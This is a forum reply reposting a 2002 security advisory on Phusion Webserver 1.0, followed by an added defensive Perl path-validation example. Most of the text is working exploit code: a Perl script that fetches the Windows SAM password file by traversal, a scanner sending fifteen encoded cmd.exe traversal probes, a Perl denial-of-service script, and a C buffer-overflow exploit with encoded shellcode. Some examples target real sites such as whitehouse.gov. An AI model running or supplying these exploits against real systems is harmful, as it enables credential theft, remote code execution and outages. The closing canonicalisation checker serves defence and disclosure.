PerlMonks  

Re: Apache(Perl?) error

by Anonymous Monk
on Jan 31, 2003 at 15:49 UTC


in reply to Apache(Perl?) error

http://www.der-keiler.de/Mailing-Lists/Securiteam/2002-02/0104.html
[NT] Phusion Webserver File Viewing, DoS and Arbitrary Code Execution Vulnerabilities

From: support@securiteam.com
To: list@securiteam.com
Date: Sun, 17 Feb 2002 10:51:46 +0100 (CET)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

Phusion Webserver File Viewing, DoS and Arbitrary Code Execution Vulnerabilities

SUMMARY

<http://www.bbshareware.com/> Phusion Webserver is a webserver for Windows 9x/NT/2000. Multiple security vulnerabilities have been found in the product that allow remote attackers to launch a denial of service, retrieve files that reside outside the normal HTTP bounding directory, overflow an internal buffer causing it to execute arbitrary code, and execute arbitrary commands (via a directory traversal bug).

DETAILS

Vulnerable systems:
Phusion Webserver version 1.0

Directory Traversal:
The security vulnerability is exploitable by using a specially crafted URL composed of triple dot ".../" directory traversal sequences, with HTTP encoded character representations substituted for "/" and "\".
Example:
http://www.example.com/.../.../.../.../test.txt

DoS attack:
The server crashes after receiving a very long URL:
Example:
http://10.0.0.1/cgi-bin/AAAAAAAAA...(Ax2500)...AAA

Buffer overflow:
By issuing a long GET HTTP request, it is possible to cause the product to overflow an internal buffer, causing it to execute arbitrary commands:
Example:
http://10.0.0.1/AAAAAAAAA...(Ax2500)...AAA

Arbitrary command execution:
By using a GET HTTP request prefixed with a '/cgi-bin/' directory it is possible to execute arbitrary commands by requesting the 'cmd.exe' executable (similar to the IIS security vulnerability).
Example:
http://10.0.0.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\

Exploit (Directory Traversal):

#!/usr/bin/perl
#
# THIS SCRIPT ONLY FOR WINDOWS WITH PERL OR CYGWIN
#
# Simple script to get files on server.
#
# Maybe u need this line for windows:
# #! c:\perl\bin\perl.exe
#
# Phusion Webserver v1.0 proof-of-concept exploit.
# By Alex Hernandez <al3xhernandez@ureach.com> (C)2002.
#
# Thanks all the people from Spain and Argentina.
# Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins,
# G.Maggiotti & H.Oliveira.
#
#
# Usage: perl -x Phusion-GET.pl <And read the Instructions>
#
#
use strict;
use warnings;

print("\nPhusion Webserver v1.0 GET Files exploit (c)2002.\n");
print("Alex Hernandez al3xhernandez\@ureach.com\n\n");

print <<"EOT";
Please type the address remote webserver, example: www.whitehouse.gov
[Default remote Webserver is "127.0.0.1"]:
EOT
# chomp, or the trailing newline ends up inside the URL; an empty answer
# selects the default (the original "<> || default" never defaulted, since
# a bare "\n" is true).
chomp(my $host = <STDIN> // '');
$host = "127.0.0.1" if $host eq '';

print <<"EOT";
Please type only in the directory where the file is located you want to download, example: /winnt/repair/
[default directory is "/winnt/repair/"] :#For IIS 4-5
EOT
chomp(my $directory = <STDIN> // '');
$directory = "/winnt/repair/" if $directory eq '';

print <<"EOT";
Please type in the filename you want download example: sam._
[default file is "sam._"] :
EOT
chomp(my $file = <STDIN> // '');
$file = "sam._" if $file eq '';

# Maybe u to change this line depending of PATH installation.
# Opens the traversal URL in the default browser (Windows only).
system("explorer.exe", "http://$host:80/../../..$directory$file");

print <<"EOT";
HAVE Fun!. ;-)
EOT

Exploit (Directory Traversal, Command Execution):

#!/usr/bin/perl
#
# Simple script to identify if the host is vulnerable!,
#
# This does 15 different checks based IIS 4-5. Have Fun!
#
# Phusion Webserver v1.0 proof-of-concept exploit
# By Alex Hernandez <al3xhernandez@ureach.com> (C)2002.
#
# Thanks all the people from Spain and Argentina.
# Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins,
# G.Maggiotti & H.Oliveira.
#
#
# Usage: perl -x Phusion_exp.pl <Hosts>:<Port>
#
# Example:
#
# perl -x Phusion_exp.pl www.whitehouse.com:80
# Trying.....................
#
# <THIS HOST IS VULNERABLE> :-)
# Check the previous notes to execute bugs.
#
#
use strict;
use warnings;
use Socket;

if ($#ARGV < 0) {
    die "\nPhusion Webserver v1.0 traversal exploit(c)2002.\n"
      . "Alex Hernandez al3xhernandez\@ureach.com\n"
      . "Usage: perl -x $0 www.whitehouse.com:80 {OR}\n"
      . "[if the host is not using a proxy]\n"
      . "Usage: perl -x $0 127.0.0.1:80\n\n";
}
my ($host, $port) = split(/:/, $ARGV[0]);   # $ARGV[0]: the original's @ARGV[0] is a one-element slice
$port ||= 80;
print "Trying.....................\n";
my $target = inet_aton($host) or die "Can't resolve $host\n";
my $flag = 0;

# The 15 test methods: IIS 4/5-style overlong-UTF-8 traversal requests,
# plus the triple-dot form (method 15). Any "Directory" in a reply
# means cmd.exe ran "dir" for us.
my @probes = (
    "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n",                                   # test method 1
    "GET /scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n",                                    # test method 2
    "GET /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n",                                   # test method 3
    "GET /scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n",                                   # test method 4
    "GET /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n",                                   # test method 5
    "GET /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n",                                   # test method 6
    "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n",                                   # test method 7
    "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n",                                   # test method 8
    "GET /scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n",                                   # test method 9
    "GET /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n",                                # test method 10
    "GET /scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n",                             # test method 11
    "GET /scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n",                          # test method 12
    "GET /scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n",                       # test method 13
    "GET /msadc/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n",     # test method 14
    "GET /.../.../.../.../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n",                                     # test method 15
);

for my $probe (@probes) {
    my @results = sendraw($probe);
    foreach my $line (@results) {
        if ($line =~ /Directory/) { $flag = 1; }
    }
}
#------------------------------
if ($flag == 1) {
    print "<THIS HOST IS VULNERABLE> :-)\n Check the previous notes to execute bugs\n";
} else {
    print "<THIS HOST IS NOT VULNERABLE> :-( \n Check manually on browser...\n";
}

# Send one raw request and return the reply lines.
sub sendraw {
    my ($pstr) = @_;
    socket(my $s, PF_INET, SOCK_STREAM, getprotobyname('tcp'))
        || die("Socket problems\n");
    connect($s, sockaddr_in($port, $target))
        || die("Can't connect check the port or address...\n");
    { my $old = select($s); $| = 1; select($old); }
    print $s $pstr;
    my @in = <$s>;
    close($s);
    return @in;
}

Exploit (DoS):

#!/usr/bin/perl
#
# Simple script to send a long 'A^s' command to the server,
# resulting in the server crashing.
#
# Phusion Webserver v1.0 proof-of-concept exploit.
# By Alex Hernandez <al3xhernandez@ureach.com> (C)2002.
#
# Thanks all the people from Spain and Argentina.
# Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins,
# G.Maggiotti & H.Oliveira.
#
#
# Usage: perl -x Phusion_DoS.pl -s <server>
#
# Example:
#
# perl -x Phusion_DoS.pl -s 10.0.0.1
#
# Crash was successful !
#
use strict;
use warnings;
use Getopt::Std;
use Socket;

print("\nPhusion Webserver v1.0 DoS exploit (c)2002.\n");
print("Alex Hernandez al3xhernandez\@ureach.com\n\n");

my %args;
getopts('s:', \%args);
usage() if !defined($args{s});

my $def  = "A";
my $num  = 3000;
my $data = $def x $num;          # 3000 'A's, past the ~2500 the advisory says crashes the server
my $serv = $args{s};
my $port = 80;
# Request line is "GET <path> HTTP/1.0"; the original's "/HTTP/1.0" was a typo.
my $buf  = "GET /cgi-bin/$data HTTP/1.0\r\n\r\n";

my $in_addr = (gethostbyname($serv))[4] || die("Error: $!\n");
my $paddr   = sockaddr_in($port, $in_addr) || die("Error: $!\n");
my $proto   = getprotobyname('tcp') || die("Error: $!\n");
socket(my $s, PF_INET, SOCK_STREAM, $proto) || die("Error: $!");
connect($s, $paddr) || die("Error: $!");
{ my $old = select($s); $| = 1; select($old); }
print $s $buf;
close($s);
print("\nCrash was successful !\n\n");

sub usage { die("\n\nUsage: perl -x $0 -s <server>\n\n"); }

Exploit (Buffer overflow):

/** Phusion-Overun.c
** -Remote exploit for Phusion Webserver v1.0 for WinNT.
**
** Phusion Webserver v1.0 exploit gets remote server's full control.
** When you attack a vulnerable server you can run arbitrary code
** inside.
**
** Phusion Webserver v1.0 proof-of-concept exploit.
** By Alex Hernandez <al3xhernandez@ureach.com> (C)2002.
**
** Thanks all the people from Spain and Argentina.
** Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins,
** G.Maggiotti & H.Oliveira.
**
**
** Compile: gcc -o Phusion-ovrun Phusion-ovrun.c
**
** Usage: ./Phusion-ovrun <hostname>
**
**
**
**
**/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/errno.h>
#include <netdb.h>

#define _PORT 80
#define _X 10000

/* Request line followed by a NOP sled, a short XOR-0x99 decoder stub,
   the encoded payload, more NOPs and the final four bytes. */
char runcrash[] = "GET /"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x81\xc7\xc8\x10\x10\x10\x81\xef\x10"
"\x10\x10\x10\x57\x5e\x33\xc0\x66\xb8\x31\x02\x90\x90\x50"
"\x59\xac\x34\x99\xaa\xe2\xfa\x71\x99\x99\x99\x99\xc4\x18"
"\x74\xb1\x89\xd9\x99\xf3\x99\xf1\x19\x99\x99\x99\xf3\x9b"
"\xf3\x99\xf3\x99\xf1\x99\x99\x99\xd9\x14\x2c\xac\x8b\xd9"
"\x99\xcf\xf1\x19\x02\xd4\x99\xc3\x66\x8b\xc9\xc2\xf3\x99"
"\x14\x24\x3a\x89\xd9\x99\xaa\x59\x32\x14\x2c\x3a\x89\xd9"
"\x99\xcf\xf1\xd3\x98\x99\x99\x09\x14\x2c\x72\x89\xd9\x99"
"\xcf\xca\xf1\x49\x05\xd4\x99\xc3\x66\x8b\xca\xf1\x05\x02"
"\xd4\x99\xc3\x66\x8b\xf1\xa9\xd4\xde\x99\xc6\x14\x2c\x3e"
"\x89\xd9\x99\xf3\xdd\x09\x09\x09\x09\xc0\x35\x33\x7b\x65"
"\xf3\x99\x23\x31\x02\xd4\x99\x66\x8b\x99\x99\x99\x99\xca"
"\xfc\xeb\xef\xfc\xeb\xb9\xf1\xf8\xfa\xf2\xfc\xfd\xb7\xa5"
"\xb6\xf1\xab\xa7\xf1\xed\xed\xe9\xa3\xb6\xb6\xee\xee\xee"
"\xb7\xfd\xfc\xfc\xe9\xe3\xf6\xf7\xfc\xb7\xf6\xeb\xfe\xb9"
"\xb9\xca\xe9\xf5\xf6\xf0\xed\xb9\xfa\xf6\xfd\xfc\xfd\xb9"
"\xfb\xe0\xb9\xe5\xc3\xf8\xf7\xb9\xe4\xa3\xb0\xa5\xf1\xed"
"\xf4\xf5\xa7\xa5\xf1\xfc\xf8\xfd\xa7\xa5\xed\xf0\xed\xf5"
"\xfc\xa7\xca\xfc\xeb\xef\xfc\xeb\xb9\xf1\xf8\xfa\xf2\xfc"
"\xfd\xb7\xa5\xb6\xed\xf0\xed\xf5\xfc\xa7\xa5\xb6\xf1\xfc"
"\xf8\xfd\xa7\xa5\xfb\xf6\xfd\xe0\xa7\xa5\xfa\xfc\xf7\xed"
"\xfc\xeb\xa7\xd1\xfc\xf5\xf5\xf6\xb7\xb9\xc0\xf6\xec\xb9"
"\xf8\xeb\xfc\xb9\xeb\xec\xf7\xf7\xf0\xf7\xfe\xb9\xf8\xb9"
"\xc3\xdb\xca\xfc\xeb\xef\xfc\xeb\xb9\xc9\xcb\xd6\xea\xb9"
"\xfb\xec\xfe\xfe\xe0\xb9\xef\xfc\xeb\xea\xf0\xf6\xf7\xb9"
"\xf8\xf7\xfd\xb9\xe0\xf6\xec\xb9\xf1\xf8\xef\xfc\xb9\xfb"
"\xfc\xfc\xf7\xb9\xf8\xfb\xec\xea\xfc\xfd\xb7\xa5\xe9\xa7"
"\xd4\xf6\xeb\xfc\xb9\xf0\xf7\xff\xf6\xeb\xf4\xf8\xed\xf0"
"\xf6\xf7\xb9\xfa\xf8\xf7\xb9\xfb\xfc\xb9\xfd\xf6\xee\xf7"
"\xf5\xf6\xf8\xfd\xb9\xff\xeb\xf6\xf4\xb9\xf1\xed\xed\xe9"
"\xa3\xb6\xb6\xee\xee\xee\xb7\xfd\xfc\xfc\xe9\xe3\xf6\xf7"
"\xfc\xb7\xf6\xeb\xfe\xb9\xf6\xeb\xb9\xf1\xed\xed\xe9\xa3"
"\xb6\xb6\xf4\xf8\xeb\xfc\xf8\xea\xef\xf0\xef\xf8\xea\xb7"
"\xfa\xf3\xfb\xb7\xf7\xfc\xed\xa5\xe9\xa7\xeb\xfc\xfe\xf8"
"\xeb\xfd\xea\xb9\xed\xf6\xb9\xdd\xfc\xfc\xe9\xc3\xf6\xf7"
"\xfc\xb9\xfa\xeb\xfc\xee\xb9\xb1\xcd\xf1\xfc\xce\xf0\xe3"
"\xf8\xeb\xfd\xb5\xb9\xd8\xf7\xec\xea\xf2\xf8\xb9\xf8\xf7"
"\xfd\xb9\xd7\xfc\xf4\xf6\xb0\xa5\xe9\xa7\xda\xf6\xfd\xfc"
"\xfd\xb9\xfb\xe0\xb9\xe5\xc3\xf8\xf7\xb7\xa5\xb6\xfa\xfc"
"\xf7\xed\xfc\xeb\xa7\xa5\xb6\xfb\xf6\xfd\xe0\xa7\xa5\xb6"
"\xf1\xed\xf4\xf5\xa7\xb7\xc5\xf1\xed\xf4\xf5\xc5\xca\xfc"
"\xeb\xef\xfc\xeb\xd8\xfb\xec\xea\xfc\xfd\xfb\xe0\xf0\xc3"
"\xf8\xf7\xb7\xf1\xed\xf4\xf5\x99\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\xac\xe0\xe3\x01";

int sock;
struct sockaddr_in sock_a;
struct hostent *host;

int main(int argc, char *argv[])
{
    printf("\nWinNT 4.0 sp5 Phusion Webserver v1.0 BufferOverrun exploit\n");
    printf("Alex Hernandez al3xhernandez@ureach.com\n\n");

    if (argc < 2) {
        fprintf(stderr, "Error : Usage: %s <hostname> \n", argv[0]);
        exit(0);
    }
    if ((host = gethostbyname(argv[1])) == NULL) {
        perror("gethostbyname");
        exit(-1);
    }
    if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
        perror("create socket");
        exit(-1);
    }
    sock_a.sin_family = AF_INET;
    sock_a.sin_port   = htons(_PORT);
    memcpy(&sock_a.sin_addr, host->h_addr_list[0], host->h_length);

    if (connect(sock, (struct sockaddr *)&sock_a, sizeof(sock_a)) != 0) {
        perror("create connect");
        exit(-1);
    }
    fflush(stdout);
    /* As written by the author: _X (10000) is well past sizeof(runcrash),
       so this write() sends the payload followed by whatever happens to
       follow the array in memory. */
    write(sock, runcrash, _X);
    write(sock, "\n\n", 2);
    printf("done.\n\n");
    return 0;
}

ADDITIONAL INFORMATION

The information has been provided by <mailto:al3xhernandez@ureach.com> Alex Hernandez.
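Added example, written for this thread and not part of the advisory or the scripts above: a Perl request-path check that does what Phusion (and IIS 4/5 before it) got wrong. It decodes in the only safe order, percent-escapes first, then UTF-8, then dot segments, and rejects every form the fifteen probe requests rely on: overlong two- to six-byte UTF-8 encodings of "/" and "\", escapes whose second hex pair is not hex, triple-dot segments, and over-long request lines. The `MAX_PATH` limit of 1024 bytes is an assumed value for this demo, not a figure from the advisory, and the sample paths are constructed from the advisory's probes plus one benign request.

```perl
#!/usr/bin/perl
# Added example (not advisory code): canonicalise a request path and
# reject the traversal encodings used by the probes above.
use strict;
use warnings;
binmode STDOUT, ':encoding(UTF-8)';

use constant MAX_PATH => 1024;   # assumed request-path limit for this demo

# Decode %XX escapes into raw bytes. Returns undef on a malformed escape,
# such as the "%c1%pc" or "%c0%9v" probes, whose second pair is not hex.
sub pct_decode {
    my ($path) = @_;
    my $out = '';
    while (length $path) {
        if    ($path =~ s/^%([0-9A-Fa-f]{2})//) { $out .= chr hex $1; }
        elsif ($path =~ s/^%//)                 { return undef; }
        else  { $path =~ s/^([^%]+)//;            $out .= $1; }
    }
    return $out;
}

# Walk a byte string as UTF-8. Returns an arrayref of [codepoint, overlong]
# pairs, or undef on a truncated/invalid sequence. Overlong forms (and the
# obsolete 5- and 6-byte forms) are still decoded so the caller can see what
# the attacker meant, e.g. %c0%af -> '/', but they are flagged.
sub utf8_lenient {
    my ($bytes) = @_;
    my @b = unpack 'C*', $bytes;
    my @cps;
    my $i = 0;
    while ($i < @b) {
        my $lead = $b[$i++];
        if ($lead < 0x80) { push @cps, [$lead, 0]; next; }
        my ($n, $cp, $min);
        if    (($lead & 0xE0) == 0xC0) { ($n, $cp, $min) = (1, $lead & 0x1F, 0x80);      }
        elsif (($lead & 0xF0) == 0xE0) { ($n, $cp, $min) = (2, $lead & 0x0F, 0x800);     }
        elsif (($lead & 0xF8) == 0xF0) { ($n, $cp, $min) = (3, $lead & 0x07, 0x10000);   }
        elsif (($lead & 0xFC) == 0xF8) { ($n, $cp, $min) = (4, $lead & 0x03, 0x200000);  }
        elsif (($lead & 0xFE) == 0xFC) { ($n, $cp, $min) = (5, $lead & 0x01, 0x4000000); }
        else  { return undef; }                  # stray continuation byte, or 0xFE/0xFF
        for (1 .. $n) {
            # e.g. %c1%1c: 0x1c is not a continuation byte
            return undef if $i >= @b || ($b[$i] & 0xC0) != 0x80;
            $cp = ($cp << 6) | ($b[$i++] & 0x3F);
        }
        push @cps, [$cp, ($cp < $min || $n > 3) ? 1 : 0];
    }
    return \@cps;
}

# Returns ($decoded_path, undef) when the path is acceptable, or
# (undef, $reason) when it must be rejected.
sub check_path {
    my ($raw) = @_;
    return (undef, 'request path too long') if length($raw) > MAX_PATH;
    my ($path) = split /\?/, $raw, 2;            # the query string is not part of the path
    my $bytes = pct_decode($path);
    return (undef, 'malformed %-escape') unless defined $bytes;
    my $cps = utf8_lenient($bytes);
    return (undef, 'malformed UTF-8') unless $cps;
    my $decoded = join '', map { chr $_->[0] } @$cps;
    return (undef, "overlong UTF-8, decodes to $decoded") if grep { $_->[1] } @$cps;
    return (undef, 'control character in path') if $decoded =~ /[\x00-\x1f\x7f]/;
    $decoded =~ tr{\\}{/};                       # Windows servers treat \ as /
    return (undef, 'dot-segment traversal')
        if grep { $_ eq '..' || /^\.{3,}$/ } split m{/}, $decoded;
    return ($decoded, undef);
}

# Constructed sample paths: one benign request plus probes from the advisory.
my @samples = (
    '/cgi-bin/test.pl?x=1',
    '/.../.../.../.../test.txt',
    '/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir',
    '/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir',
    '/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir',
    '/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir',
    '/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir',
    '/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir',
    '/cgi-bin/' . ('A' x 2500),
);
for my $raw (@samples) {
    my ($ok, $why) = check_path($raw);
    my $shown = length($raw) > 55 ? substr($raw, 0, 52) . '...' : $raw;
    printf "%-56s %s\n", $shown, defined $ok ? "ALLOW  $ok" : "REJECT $why";
}
```

Two design points matter here. The overlong check runs on the fully percent-decoded bytes, so "%c0%af" and a literal 0xC0 0xAF in the raw request line are treated identically; checking for ".." on the raw, still-encoded URL is exactly the mistake that let these probes through. And rejecting rather than "repairing" an overlong sequence is deliberate: the decoded value is printed only so an operator reviewing logs can see that `%c1%9c` was meant as a backslash.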
